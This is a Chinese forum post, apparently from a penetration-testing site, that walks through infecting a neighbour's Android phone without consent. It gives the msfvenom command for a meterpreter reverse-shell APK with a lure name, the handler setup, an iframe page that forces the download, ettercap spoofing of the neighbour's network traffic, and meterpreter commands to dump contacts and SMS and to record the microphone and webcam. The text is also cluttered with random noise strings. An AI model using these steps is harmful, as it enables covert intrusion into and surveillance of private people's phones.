五、msf+ettercap入侵邻居安卓手机
& P( T' O4 n6 P5 ?+ M0 p, N4 D! `% e% i) ^% c+ ^0 p8 n) `, v 首先启动msf
- L' u+ i5 q5 H, h8 I, F# x: I3 b( Q) A 先用kali生成一个安卓木马,如下命令: 9 r) k. y$ J& C+ @( N
7 Q9 `% a% d& O0 o8 a; _1 e4 z. x Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk - o# R9 r, j( Q- ]3 v" c7 ]; i! X
/ b+ ^% w( e# Y) f* A8 h/ }, |: f! ]0 r8 }/ K
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 , k7 t, D L+ I0 @1 | O8 i
5 U; ?! z+ [- `! Y# L 然后进入msf
use exploit/multi/handler
0 a) ]- D7 D+ X+ ^& X; j set payload android/meterpreter/reverse_tcp
! c# ~ o: r$ t' D$ I: B3 ]5 A2 l: S- y; ~, H6 |4 y; L set LHOST 192.168.0.109 //ip为kaili的ip $ H' C- T! P+ z! I, ~
0 q" x0 o& x: p+ {- n; ~. l7 _set LPORT 44444 //端口一定要与前面生成的木马的端口一致
7 k v5 U6 l) y* i3 B. p, d4 u* F/ g y' I( p- z Exploit ; A% c e$ D% G+ a% K1 E& ]9 {4 [
( u: x" p2 Z" X* u% M% h1 t @; H- V1 T3 e% Q* {
# {% Q2 E7 L* R' _. O3 x
' y* A# X& l6 d$ O* w2 Z 下面我们开启ettercap -G
& G# F2 ]! d7 E' [7 t( e. L8 W Z N/ p- q' W 我物理IP为 ; o' E0 W. I3 T1 @7 l% V
" w9 |2 Y! b) q/ a+ v2 e; Y9 A
+ T- v6 }, z1 s; Y3 B
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
下面我们来设置一下 / X% f1 v1 I: C! J( t0 @# B
3 g. G- y J1 q6 _
$ j" s9 c7 J4 h! W, E; e6 `( B
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
+ y2 z( Q$ g$ N5 w4 l ) I4 c4 l3 f) @! g( Q8 k
* G, Q' p' [9 m- W# k, f$ t
+ m. M. k8 {5 t9 J( f
/ Q, c- @6 \" |! A* |7 A
. m( g/ B7 F. D2 ^3 R
7 Q1 G' s2 r: d* |" E6 ]4 y6 @' g2 J( m- s! m
& j# m6 l3 i, |$ i8 V# f+ b7 m% A% [+ e* H6 m: Z+ ~
5 P# _- j( } |- G9 o: m
& d# N# Z* e) s1 z8 f
) J4 M' V1 V8 m. @
( J$ Q" C( J, \6 l* L6 [6 o i' G 下面我们开始攻击 , v3 ^9 I% l: N, ] D. c: `
2 ?; g/ Z6 X: x" k( i1 D[2 G% r' O: a
. Q5 e3 [" d; v; E" d! |4 m
0 T. ~/ p1 s+ ~4 n4 x ]2 M& t- `5 m# z) g7 H3 p
! t) a* L; L/ Z; I3 Z# R ]
: y* A2 W) w( S4 ~$ |
/ C0 G2 d4 E. A: p: V& m 大概过了5分钟多,发现反弹成功了
0 _: R1 T8 I5 U2 F* n, Q/ D7 {( g' d& ?! _. v
2 B' t4 A9 X4 H. W/ n; \1 q, M% d |$ s
5 u8 _* Q: y* D, _$ V' C1 U8 K( P$ v' x' E2 O9 D8 k5 H; D
3 L4 F& m* Q+ |; g7 ]- F, M! x; h! p& K2 _- q3 R( f : d# N0 l2 K. s' X4 w- m
, \7 k, m9 K) e4 V8 L l9 K
, t9 H; r$ j4 ^
% ?& z& h( Q! G* p1 A1 v& Q6 w
4 _! P4 F7 d# ?+ v& Q 执行命令 5 \, R& Z. G2 f- R3 |% P9 v$ i
! {8 N& V' ~) H0 P& U' d, s1 P( ^$ @1 B- L. P' x9 t$ b
+ f! L6 Y" ~) s+ x; g( P( @ dump_contacts --》这个是导出电话
dump_sms --》这个是导出信息
record_mic Record audio from the default microphone for X seconds
( M( [: J2 |8 B) R" P4 W+ G webcam_chat Start a video chat
5 H' u% [2 @: \% S, B( ^+ |$ e3 s% s# d* g7 r8 \ f9 a$ ~ webcam_list List webcams " i8 l, @ \4 @$ {6 [7 z
webcam_snap Take a snapshot from the specified webcam
+ y. {$ V/ N' l0 @' e
webcam_stream  
lay a video stream from the specified webcam : ] I$ ?" [* `
+ {! {* `* }& b5 e# {" X, T! X! d2 X
4 _5 } s7 T' Y$ \
我们打开看一下电话薄,
; b6 Q& z3 T# _0 X7 [8 Y8 r6 b, V7 l* }7 }: P
" d7 [7 H) _ u6 s& D
! h: U1 `+ A% c( ^
0 k3 s( V6 _2 \6 T9 S ' e: V6 ~6 H) ]
$ n( w+ x- Y3 C; F& _* ^& j- X0 J% @( j; X2 P! d8 K0 v 我们同时欺骗成DroidJack木马,使用方法如图: - ^+ ]5 g% |' h9 q
! ]% Z* j9 |6 @# F
5 A3 }0 t6 K3 z5 a" ^$ O7 c 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
4 R8 W, ~* U$ w2 @+ C+ R
' n H6 k6 y# ~9 x5 z# T8 b
; g8 R/ H+ @: o9 t0 i
! V2 r/ }: k3 l/ s- J0 S. ?

| 欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |